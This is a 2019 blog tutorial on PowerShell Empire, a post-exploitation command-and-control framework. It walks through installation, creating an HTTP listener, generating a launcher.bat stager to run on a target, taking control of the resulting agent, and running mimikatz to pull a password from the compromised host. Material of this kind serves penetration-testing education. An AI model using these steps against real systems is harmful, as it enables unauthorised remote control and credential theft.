July 09, 2019

Powershell Empire: Hands on practical guide

Hello my dear readers, in this article I am going to introduce you with a very powerful PowerShell tool, which is called “empire”. Powershell Empire is a post exploitation tool which is mostly used in computers and servers running Microsoft Windows, Windows Server Operating systems. It is cryptographically protected and provides flexible architecture.

The best part of Powershell Empire is, it can execute powershell agent without the need of Powershell.exe. It is mostly similar to Metasploit and Meterpreter except user can use the Empire as command and control tool, to control a PC more efficiently.

Components of Empire:

Listener: The listener is a process which listens for connections from the target system and helps the empire send the loot (ex-filtered data) back to the attacker’s system.

Stager: A stager is a snippet of code which provides the platform to execute the malicious code to be run via the agent on the compromised system.

Agent: An agent is a piece of code which maintains a connection between your system and the compromised host.

Module: These are what execute the malicious command and harvest the credentials and escalate the privilege and other desired intention.

Installation of Empire framework:

#Download the repository
 git clone https://github.com/EmpireProject/Empire.git
#Install Empire 
sudo bash ./Empire/setup/install.sh
#start the Empire console
Note: If any case it will through errors while starting, please go to the setup directory and execute “./reset” script. Hope it will resolve the issue.
The below window you will get when the Empire console successfully open up.
Type help command for get to know more about commands those are available to use.

We will start with the creation of a listener. The listener is nothing but the component which is running inside the command and control server and wait for the compromised host to connected to it.
Please enter the below commands to create a listener.

#Enter the listeners menu

# View available listener types
Type “uselistener <TAB>”

# Create a listener
In this article we will use “http” listener.

Once selected the listener we want to create, now enter “info” to display the available options

You will get the available parameters with default values. If you want you can change using set command like metasploit.

Once we are satisfied with the settings we can proceed to type execute command.

Like metasploit we can easily create payloads in Empire to connect to the host. To view the available payloads in empire we need the type the below command.

# View all payload types
Ø  usestager <TAB>

In this article we will choose windows/lunch_bat

Ø  userstager windows/launcher.bat
Type “info” to get available fields and their default values.

If all set then we can proceed to type execute command and hit the enter.

Now copy the launcher.bat file and execute it inside the targeted system and comeback.

If our system is reachable to the targeted host we can easily receive a connection back to Empire.

To see the connection type “agents” command to see the available connection list. Some time it will take few minutes to get the connection.

Now enter ‘help’ to get all the possible option to communicate with the compromised host.

We will use interact command with the agent name to connect to the targeted host

Ø  interact E9Y42CU3

After get inside the host type "help" to get the more options, that are available to perform with the compromised host.

Let’s start with the ‘info’ command and have all the details about the target.

Next we will type ‘sysinfo’ to get the system information.

So we do not stop with the basic info let’s try the Mimicatz. Which is known as the most powerful post exploitation tool.

# To Launch mimikatz type
Ø  mimikatz

Here in the output we have got the password (12345) of the compromised host ( successfully. We can get lot of other informations as well, let's not discuss here. I will write a separate article on this in my upcoming blog.

You can do much more things with Powershell Empire. Just check more about it in Google, Github and the Wiki page.

I hope you enjoyed this article. Please do share and let me know your feedback and other queries in the comment section. See you in my next article. Happy Hacking!!


Post a Comment